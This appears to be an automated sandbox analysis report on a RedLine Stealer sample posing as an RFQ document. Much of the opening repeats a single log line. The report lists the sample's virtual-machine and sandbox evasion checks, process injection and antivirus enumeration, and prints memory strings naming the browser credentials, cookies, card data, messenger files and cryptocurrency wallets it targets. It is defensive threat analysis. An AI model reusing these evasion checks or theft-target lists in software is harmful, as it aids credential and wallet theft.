                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6376, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.266425156.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                        Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe TID: 6396Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe TID: 6160Thread sleep time: -20291418481080494s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWindow / User API: threadDelayed 3369Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWindow / User API: threadDelayed 6081Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.367935369.0000000006A73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\EnumNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WWW /c Microsoft-Hyper-V-Common-Drivers-Package
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.367935369.0000000006A73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMware24HU1K2KWin32_VideoController1Z774E17VideoController120060621000000.000000-00015289352display.infMSBDAAP8LDF5PPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsKXHCLV76]
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000003.317080374.0000000001551000.00000004.00000020.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000003.331533019.0000000001548000.00000004.00000020.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000003.291308451.0000000001576000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        .NET source code references suspicious native API functions
                        Source: RFQ - FYKS - 06052022.exe, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Source: RFQ - FYKS - 06052022.exe, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 0.0.RFQ - FYKS - 06052022.exe.1300000.0.unpack, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Source: 0.0.RFQ - FYKS - 06052022.exe.1300000.0.unpack, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 0.2.RFQ - FYKS - 06052022.exe.1300000.0.unpack, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 0.2.RFQ - FYKS - 06052022.exe.1300000.0.unpack, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.5.unpack, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.5.unpack, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.1.unpack, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.1.unpack, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, NativeHelper.csReference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.3.unpack, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.3.unpack, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.2.unpack, u0035457375725/u0035523505689.csReference to suspicious API methods: ('1555012862', 'LoadLibrary@kernel32'), ('5693791673', 'GetProcAddress@kernel32')
                        Source: 1.0.RFQ - FYKS - 06052022.exe.1300000.2.unpack, u0031254424395/u0038515080887.csReference to suspicious API methods: ('6797731364', 'OpenProcessToken@advapi32.dll'), ('4655851571', 'OpenProcessToken@advapi32.dll')
                        Injects a PE file into a foreign processes
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeMemory written: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe base: 400000 value starts with: 4D5AJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeProcess created: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.368137719.0000000006AC5000.00000004.00000800.00020000.00000000.sdmp, RFQ - FYKS - 06052022.exe, 00000001.00000002.367935369.0000000006A73000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                        Stealing of Sensitive Information

                        barindex
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.RFQ - FYKS - 06052022.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.417b608.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.4156458.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.RFQ - FYKS - 06052022.exe.400000.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.RFQ - FYKS - 06052022.exe.419b628.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.362585118.000000000326F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278824606.000000000419B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.256613856.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257515247.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.278884493.00000000041E6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.361370195.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.256255290.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.257103376.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6376, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RFQ - FYKS - 06052022.exe PID: 6428, type: MEMORYSTR
                        Tries to steal Crypto Currency Wallets
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Users\user\Desktop\RFQ - FYKS - 06052022.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Found many strings related to Crypto-Wallets (likely being stolen)
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                        Source: RFQ - FYKS - 06052022.exe, 00000001.00000002.363139999.000000000356C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: l1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                        Source: RFQ - FYKS - 06052022.exe, 00000000.00000002.278732961.000000000414B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
